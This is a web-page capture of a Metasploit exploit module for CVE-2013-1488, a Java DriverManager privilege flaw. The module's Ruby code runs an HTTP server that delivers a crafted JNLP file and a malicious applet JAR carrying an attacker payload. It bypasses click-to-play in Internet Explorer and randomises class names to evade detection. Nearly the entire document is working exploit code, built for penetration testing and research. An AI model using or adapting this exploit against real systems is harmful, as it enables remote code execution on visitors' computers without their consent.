Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/java_jre17_driver_manager.rb
31430 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10
  include Msf::Exploit::EXE

11


12
  # include Msf::Exploit::Remote::BrowserAutopwn

13
  # autopwn_info({ :javascript => false })

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'Java Applet Driver Manager Privileged toString() Remote Code Execution',

20
        'Description' => %q{

21
          This module abuses the java.sql.DriverManager class where the toString() method

22
          is called over user supplied classes from a doPrivileged block. The vulnerability

23
          affects Java version 7u17 and earlier. This exploit bypasses click-to-play on Internet Explorer

24
          and throws a specially crafted JNLP file. This bypass is applicable mainly to IE, where Java

25
          Web Start can be launched automatically through the ActiveX control. Otherwise, the

26
          applet is launched without click-to-play bypass.

27
        },

28
        'License' => MSF_LICENSE,

29
        'Author' => [

30
          'James Forshaw', # Vulnerability discovery and Analysis

31
          'juan vazquez' # Metasploit module

32
        ],

33
        'References' => [

34
          [ 'CVE', '2013-1488' ],

35
          [ 'OSVDB', '91472' ],

36
          [ 'BID', '58504' ],

37
          [ 'URL', 'http://www.contextis.com/research/blog/java-pwn2own/' ],

38
          [ 'URL', 'http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html' ],

39
          [ 'ZDI', '13-076' ]

40
        ],

41
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },

42
        'Targets' => [

43
          [

44
            'Generic (Java Payload)',

45
            {

46
              'Platform' => ['java'],

47
              'Arch' => ARCH_JAVA

48
            }

49
          ],

50
          [

51
            'Windows x86 (Native Payload)',

52
            {

53
              'Platform' => 'win',

54
              'Arch' => ARCH_X86

55
            }

56
          ],

57
          [

58
            'Mac OS X x86 (Native Payload)',

59
            {

60
              'Platform' => 'osx',

61
              'Arch' => ARCH_X86

62
            }

63
          ],

64
          [

65
            'Linux x86 (Native Payload)',

66
            {

67
              'Platform' => 'linux',

68
              'Arch' => ARCH_X86

69
            }

70
          ],

71
        ],

72
        'DefaultTarget' => 0,

73
        'DisclosureDate' => '2013-01-10',

74
        'Notes' => {

75
          'Reliability' => UNKNOWN_RELIABILITY,

76
          'Stability' => UNKNOWN_STABILITY,

77
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

78
        }

79
      )

80
    )

81
  end

82


83
  def setup

84
    path = File.join(Msf::Config.data_directory, 'exploits', 'cve-2013-1488', 'Exploit.class')

85
    @exploit_class = File.open(path, 'rb') { |fd| fd.read(fd.stat.size) }

86
    path = File.join(Msf::Config.data_directory, 'exploits', 'cve-2013-1488', 'FakeDriver.class')

87
    @driver_class = File.open(path, 'rb') { |fd| fd.read(fd.stat.size) }

88
    path = File.join(Msf::Config.data_directory, 'exploits', 'cve-2013-1488', 'FakeDriver2.class')

89
    @driver2_class = File.open(path, 'rb') { |fd| fd.read(fd.stat.size) }

90
    path = File.join(Msf::Config.data_directory, 'exploits', 'cve-2013-1488', 'META-INF', 'services', 'java.lang.Object')

91
    @object_services = File.open(path, 'rb') { |fd| fd.read(fd.stat.size) }

92
    path = File.join(Msf::Config.data_directory, 'exploits', 'cve-2013-1488', 'META-INF', 'services', 'java.sql.Driver')

93
    @driver_services = File.open(path, 'rb') { |fd| fd.read(fd.stat.size) }

94


95
    @exploit_class_name = rand_text_alpha('Exploit'.length)

96
    @exploit_class.gsub!('Exploit', @exploit_class_name)

97


98
    @jnlp_name = rand_text_alpha(8)

99


100
    super

101
  end

102


103
  def jnlp_file

104
    jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"

105


106
    jnlp = %(

107
<?xml version="1.0" encoding="utf-8"?>

108
<jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="#{jnlp_uri}">

109
  <information>

110
    <title>Applet Test JNLP</title>

111
    <vendor>#{rand_text_alpha(8)}</vendor>

112
    <description>#{rand_text_alpha(8)}</description>

113
    <offline-allowed/>

114
  </information>

115


116
  <resources>

117
    <j2se version="1.7+" href="http://java.sun.com/products/autodl/j2se" />

118
    <jar href="#{rand_text_alpha(8)}.jar" main="true" />

119
  </resources>

120
  <applet-desc name="#{rand_text_alpha(8)}" main-class="#{@exploit_class_name}" width="1" height="1">

121
    <param name="__applet_ssv_validated" value="true"></param>

122
  </applet-desc>

123
  <update check="background"/>

124
</jnlp>

125
    )

126
    return jnlp

127
  end

128


129
  def on_request_uri(cli, request)

130
    print_status("handling request for #{request.uri}")

131


132
    case request.uri

133
    when /\.jnlp$/i

134
      send_response(cli, jnlp_file, { 'Content-Type' => 'application/x-java-jnlp-file' })

135
    when /\.jar$/i

136
      jar = payload.encoded_jar

137
      jar.add_file("#{@exploit_class_name}.class", @exploit_class)

138
      jar.add_file('FakeDriver.class', @driver_class)

139
      jar.add_file('FakeDriver2.class', @driver2_class)

140
      jar.add_file('META-INF/services/java.lang.Object', @object_services)

141
      jar.add_file('META-INF/services/java.sql.Driver', @driver_services)

142
      metasploit_str = rand_text_alpha('metasploit'.length)

143
      payload_str = rand_text_alpha('payload'.length)

144
      jar.entries.each do |entry|

145
        entry.name.gsub!('metasploit', metasploit_str)

146
        entry.name.gsub!('Payload', payload_str)

147
        entry.data = entry.data.gsub('metasploit', metasploit_str)

148
        entry.data = entry.data.gsub('Payload', payload_str)

149
      end

150
      jar.build_manifest

151


152
      send_response(cli, jar, { 'Content-Type' => 'application/octet-stream' })

153
    when %r{/$}

154
      payload = regenerate_payload(cli)

155
      if !payload

156
        print_error('Failed to generate the payload.')

157
        send_not_found(cli)

158
        return

159
      end

160
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })

161
    else

162
      send_redirect(cli, get_resource + '/', '')

163
    end

164
  end

165


166
  def generate_html

167
    jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"

168


169
    # When the browser is IE, the ActvX is used in order to load the malicious JNLP, allowing click2play bypass

170
    # Else an <applet> tag is used to load the malicious applet, this time there isn't click2play bypass

171
    html = %(

172
    <html>

173
    <body>

174
    <object codebase="http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0" classid="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" height=0 width=0>

175
    <param name="app" value="#{jnlp_uri}">

176
    <param name="back" value="true">

177
    <applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>

178
    </object>

179
    </body>

180
    </html>

181
    )

182
    return html

183
  end

184
end

185


186